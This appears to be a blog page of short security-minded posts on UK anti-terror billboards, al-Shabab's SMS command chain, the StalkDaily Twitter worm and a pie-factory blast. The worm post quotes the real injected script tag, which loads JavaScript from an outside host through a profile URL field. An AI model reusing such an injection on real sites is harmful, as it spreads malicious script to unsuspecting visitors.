Emergent Chaos has pointed out anti-terror billboards for the UK are now customizable:

Make your own at https://jamesholden.net/billboard/

Wow, this is far better than those funny custom t-shirts. Don’t mind if I do…

Too sarcastic? How about this one?

Somalia is getting attention from BBC NEWS | Africa, for having a “text message insurgency”.

The leaders of the group – which has taken over swathes of central and southern Somalia – are unknown to their subordinates.

The middle lieutenants get their orders through text messages, or phone calls from recognised voices, giving them proof the instructions are coming from the right person.

The leaders of al-Shabab are called “emirs” and they do not usually come from the region they administer.

Although I see the attempt at novelty, the story feels a bit thin to me. The insurgents also use pickup trucks and machine guns. Why are text messages so different from other technologies in terms of our expectations for use by rebellious groups?

More interesting to me is the fact that these soldiers have a weak link to their superiors and are given no way to authenticate instructions other than recognized voice. That certainly does not help for SMS messages. How do they find trust? Unless there are keys or secrets, compromising the insurgent command structure therefore seems trivial. I wonder what would happen if the telecom(s) they use sent a “disband and return to work now” SMS. More sinister would be a “gather at x location and wear a bright red hat” instruction.

DCortesi has posted a nice summary of a script exploit in Twitter

I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:

<a href="http://www.stalkdaily.com">
<script src="hxxp://mikeyylolz.uuuq.com/x.js%3E">
</script></a>

Twitter allowed encoding in a profile’s URL field, so the malicious JavaScript would run as soon as someone viewed a compromised twitter profile page. Then anyone who looked at your page would be infected as well, and so forth.

An excellent way to prevent this is with “noscript” or similar utilities that require you to whitelist javascript, as DCortesi mentions. You would be prompted to allow a uuuq.com script, at which point you hopefully would say no and realize the twitter page is compromised. This is not foolproof, of course, as many would not realize that uuuq.com is suspicious. Another method of prevention is to avoid using Twitter. Haha.

Countless pies have been lost and a baker killed in a massive blast in England. The news reports have released few details so far

The explosion wrecked the Andrew Jones Pies factory in Old Leeds Road early this morning and police confirmed shortly before 11am that one person had died as the brick-built building was shattered by the blast.

Although they made a chicken pot pie, fowl play is not suspected.